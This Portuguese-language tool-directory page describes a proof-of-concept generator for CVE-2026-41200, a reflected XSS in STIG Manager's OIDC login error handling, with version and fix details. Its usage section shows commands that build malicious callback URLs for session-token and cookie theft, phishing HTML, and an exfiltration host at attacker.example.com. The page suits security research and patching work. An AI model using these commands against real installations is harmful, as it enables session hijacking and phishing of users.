Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-41200-stig-manager-oidc-reflected-xss — Gerador de exploit de prova de conceito para XSS refletido na autenticação OIDC do STIG Manager, permitindo roubo de tokens de sessão através de URLs de callback manipuladas e saída HTML de phishing. | Kitploit
Ferramentas/GitHubGitHub/hunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhunt-benito/cve-2026-41200-stig-manager-oidc-reflected-xss

cve-2026-41200-stig-manager-oidc-reflected-xss

Gerador de exploit de prova de conceito para XSS refletido na autenticação OIDC do STIG Manager, permitindo roubo de tokens de sessão através de URLs de callback manipuladas e saída HTML de phishing.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 mesesAinda não revisado

CVE-2026-41200 — PoC de XSS Refletido no STIG Manager OIDC

Prova de Conceito conceitual para a vulnerabilidade de Cross-Site Scripting (XSS) refletido no STIG Manager versões 1.5.10 até 1.6.7.

Resumo da Vulnerabilidade

Existe uma vulnerabilidade de XSS refletido no código de tratamento de erros de autenticação OIDC do aplicativo web STIG Manager. Os parâmetros de consulta error e error_description retornados pelo provedor OIDC são escritos diretamente no DOM via innerHTML sem escape HTML. Um atacante que consiga criar uma URL maliciosa e convencer um usuário a segui-la pode executar JavaScript arbitrário no contexto da aplicação.

A vulnerabilidade é mais grave quando o usuário alvo possui uma sessão ativa do STIG Manager em outra aba do navegador — o código injetado pode se comunicar com o SharedWorker que gerencia o token de acesso, permitindo requisições autenticadas à API em nome da vítima.

  • CVE: CVE-2026-41200
  • CVSS 4.0: 8.5 (ALTA)
  • Afetados: NUWCDIVNPT/stig-manager >= 1.5.10, < 1.6.8
  • Corrigido: v1.6.8
  • Aviso: GHSA-wg33-j3rv-jq72
  • Artigo: hunt-benito.com

Uso

root@kitploit:~
# Generate a malicious callback URL (SharedWorker token theft mode)
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m sharedworker

# Generate a simple cookie theft payload
python3 cve-2026-41200-poc.py -c http://localhost:54000/auth/callback -m simple

# Output as phishing HTML
python3 cve-2026-41200-poc.py --format html

# Custom API and exfil hosts
python3 cve-2026-41200-poc.py \
  -c https://stig-manager.example.com/auth/callback \
  -a https://stig-manager.example.com \
  -e https://attacker.example.com

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e pesquisa de segurança autorizada.

  • Use apenas contra instalações que você possui ou para as quais tenha autorização explícita para testar.
  • O acesso não autorizado a sistemas de computador é ilegal na maioria das jurisdições.
  • Os autores não assumem nenhuma responsabilidade pelo uso indevido desta ferramenta.
Baixar ferramenta